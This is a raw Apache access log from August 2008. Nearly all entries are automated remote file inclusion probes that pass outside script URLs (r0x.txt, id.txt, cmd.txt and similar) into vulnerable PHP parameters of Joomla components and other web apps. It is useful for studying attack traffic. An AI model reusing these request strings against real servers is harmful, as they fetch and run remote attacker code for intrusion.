218.38.12.93 - - [16/Aug/2008:23:59:04 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:59:11 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
67.15.186.5 - - [17/Aug/2008:00:04:48 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
89.108.66.136 - - [17/Aug/2008:00:07:41 -0500] "GET /logs/errors.php?error=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.66.136 - - [17/Aug/2008:00:07:41 -0500] "GET /errors.php?error=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
62.109.176.109 - - [17/Aug/2008:00:10:56 -0500] "GET /logs/access_log.1214524800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:00:11:00 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:00:11:04 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
24.15.17.201 - - [17/Aug/2008:00:11:15 -0500] "GET /logs/access_log.1214524800//admin/editor2/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:00:11:48 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:00:11:49 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
206.252.131.151 - - [17/Aug/2008:00:12:42 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:42 -0500] "GET //skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:42 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:44 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:44 -0500] "GET //skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:44 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:45 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:12:47 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
67.15.186.5 - - [17/Aug/2008:00:16:01 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
206.252.131.151 - - [17/Aug/2008:00:19:31 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:19:31 -0500] "GET //skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
67.15.186.5 - - [17/Aug/2008:00:24:16 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:00:24:40 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
206.252.131.151 - - [17/Aug/2008:00:25:01 -0500] "GET /logs/access_log.1213488000//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:25:02 -0500] "GET /logs/access_log.1213488000//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
62.87.154.41 - - [17/Aug/2008:00:25:33 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.87.154.41 - - [17/Aug/2008:00:25:33 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
62.109.176.109 - - [17/Aug/2008:00:25:46 -0500] "GET /logs/access_log.1214438400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
218.38.18.28 - - [17/Aug/2008:00:26:07 -0500] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:00:26:07 -0500] "GET //includes/dbal.php?eqdkp_root_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
62.87.154.41 - - [17/Aug/2008:00:27:05 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.87.154.41 - - [17/Aug/2008:00:27:05 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
218.38.12.93 - - [17/Aug/2008:00:28:53 -0500] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:00:28:53 -0500] "GET //includes/dbal.php?eqdkp_root_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
141.44.140.111 - - [17/Aug/2008:00:29:07 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 292 "-""Mozilla/5.0"
141.44.140.111 - - [17/Aug/2008:00:29:07 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 287 "-""Mozilla/5.0"
64.105.33.158 - - [17/Aug/2008:00:29:26 -0500] "GET /logs/access_log.1205366400/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.252.131.151 - - [17/Aug/2008:00:33:50 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:33:50 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:33:50 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:33:50 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
147.202.40.223 - - [17/Aug/2008:00:34:07 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.814"
147.202.40.223 - - [17/Aug/2008:00:34:07 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
211.45.172.76 - - [17/Aug/2008:00:34:35 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 292 "-""Mozilla/5.0"
211.45.172.76 - - [17/Aug/2008:00:34:35 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 287 "-""Mozilla/5.0"
81.209.147.100 - - [17/Aug/2008:00:38:11 -0500] "GET /logs/access_log.1205366400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id.txt????? HTTP/1.1" 404 372 "-""libwww-perl/5.79"
81.209.147.100 - - [17/Aug/2008:00:38:12 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id.txt????? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
81.209.147.100 - - [17/Aug/2008:00:38:12 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id.txt????? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
202.60.72.69 - - [17/Aug/2008:00:38:28 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
202.60.72.69 - - [17/Aug/2008:00:38:29 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
218.38.18.28 - - [17/Aug/2008:00:39:14 -0500] "GET /logs/access_log.1214524800//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
24.15.17.201 - - [17/Aug/2008:00:40:19 -0500] "GET /logs/access_log.1214438400//admin/editor2/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
87.106.73.118 - - [17/Aug/2008:00:40:31 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
146.96.128.46 - - [17/Aug/2008:00:41:19 -0500] "GET //?mosConfig_absolute_path=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 200 1243 "-""Avant Browser (http://www.avantbrowser.com)"
146.96.128.46 - - [17/Aug/2008:00:41:20 -0500] "GET /logs//?mosConfig_absolute_path=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 200 95586 "-""Avant Browser (http://www.avantbrowser.com)"
218.38.12.93 - - [17/Aug/2008:00:42:21 -0500] "GET /logs/access_log.1214524800//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:00:43:02 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
77.75.76.115 - - [17/Aug/2008:00:43:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""SeznamBot/2.0 (+http://fulltext.seznam.cz/)"
77.75.76.115 - - [17/Aug/2008:00:43:32 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "-""SeznamBot/2.0 (+http://fulltext.seznam.cz/)"
206.252.131.151 - - [17/Aug/2008:00:43:46 -0500] "GET /logs/access_log.1206230400//claroline/tracking/userLog.php?rootSys=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:43:46 -0500] "GET //claroline/tracking/userLog.php?rootSys=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:43:46 -0500] "GET /logs//claroline/tracking/userLog.php?rootSys=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.106.77.242 - - [17/Aug/2008:00:44:45 -0500] "GET /logs/access_log.1203379200//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
87.106.77.242 - - [17/Aug/2008:00:44:45 -0500] "GET //includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
87.106.77.242 - - [17/Aug/2008:00:44:45 -0500] "GET /logs//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
218.38.12.93 - - [17/Aug/2008:00:46:17 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:00:47:32 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:00:47:32 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
77.232.68.17 - - [17/Aug/2008:00:47:59 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:00:48:04 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.38.18.28 - - [17/Aug/2008:00:50:27 -0500] "GET /logs/access_log.1202947200//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:00:50:27 -0500] "GET /logs/access_log.1203552000//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:00:51:18 -0500] "GET /logs/access_log.1202947200//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:00:51:19 -0500] "GET /logs/access_log.1203552000//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
193.142.215.12 - - [17/Aug/2008:00:51:40 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
218.189.215.153 - - [17/Aug/2008:00:52:15 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 288 "-""libwww-perl/5.805"
218.189.215.153 - - [17/Aug/2008:00:52:16 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 283 "-""libwww-perl/5.805"
193.188.66.6 - - [17/Aug/2008:00:53:02 -0500] "GET /logs/access_log.1203379200//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:02 -0500] "GET /logs/access_log.1203379200//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:02 -0500] "GET //includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:02 -0500] "GET /logs/access_log.1203379200//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:03 -0500] "GET //includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:03 -0500] "GET /logs//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:03 -0500] "GET //includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:03 -0500] "GET /logs//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
193.188.66.6 - - [17/Aug/2008:00:53:03 -0500] "GET /logs//includes/cart.inc.php?dir_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
81.209.147.100 - - [17/Aug/2008:00:53:11 -0500] "GET /logs/access_log.1214179200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id.txt????? HTTP/1.1" 404 372 "-""libwww-perl/5.79"
74.52.139.226 - - [17/Aug/2008:00:55:10 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
74.52.139.226 - - [17/Aug/2008:00:55:10 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
220.73.137.93 - - [17/Aug/2008:00:55:39 -0500] "GET /logs/include.php?path[docroot]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
220.73.137.93 - - [17/Aug/2008:00:55:40 -0500] "GET /include.php?path[docroot]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
220.73.137.93 - - [17/Aug/2008:00:55:41 -0500] "GET /logs/include.php?path[docroot]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
220.73.137.93 - - [17/Aug/2008:00:55:41 -0500] "GET /include.php?path[docroot]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
212.26.146.248 - - [17/Aug/2008:00:56:41 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:00:56:43 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.252.131.151 - - [17/Aug/2008:00:56:48 -0500] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:56:48 -0500] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:56:49 -0500] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:00:56:49 -0500] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.26.146.248 - - [17/Aug/2008:00:56:51 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
212.26.146.248 - - [17/Aug/2008:00:56:52 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
203.88.114.169 - - [17/Aug/2008:00:56:59 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
203.88.114.169 - - [17/Aug/2008:00:56:59 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
64.105.33.158 - - [17/Aug/2008:00:57:05 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
194.97.107.195 - - [17/Aug/2008:00:59:24 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
194.97.107.195 - - [17/Aug/2008:00:59:25 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
216.180.241.37 - - [17/Aug/2008:01:00:45 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.180.241.37 - - [17/Aug/2008:01:00:45 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
70.85.222.106 - - [17/Aug/2008:01:01:49 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
70.85.222.106 - - [17/Aug/2008:01:01:49 -0500] "GET /index.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
69.61.106.55 - - [17/Aug/2008:01:03:11 -0500] "GET //skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:03:14 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:03:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:03:14 -0500] "GET //skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:03:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:03:14 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
218.38.18.28 - - [17/Aug/2008:01:03:23 -0500] "GET /logs//includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:03:23 -0500] "GET //includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
89.111.176.64 - - [17/Aug/2008:01:03:39 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.111.176.64 - - [17/Aug/2008:01:03:39 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.38.12.93 - - [17/Aug/2008:01:03:59 -0500] "GET /logs//includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:03:59 -0500] "GET //includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:05:58 -0500] "GET /logs//includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:05:59 -0500] "GET //includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:05:59 -0500] "GET /logs//db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:06:00 -0500] "GET //db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:43 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:43 -0500] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:43 -0500] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:44 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:44 -0500] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
206.252.131.151 - - [17/Aug/2008:01:06:44 -0500] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
147.202.40.223 - - [17/Aug/2008:01:06:48 -0500] "GET /logs/access_log.1206230400//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
218.38.12.93 - - [17/Aug/2008:01:08:28 -0500] "GET /logs//includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:08:29 -0500] "GET //includes/db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:09:14 -0500] "GET /logs//db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:09:15 -0500] "GET //db_connect.php?baseDir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.98.141.70 - - [17/Aug/2008:01:11:09 -0500] "GET /logs/errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
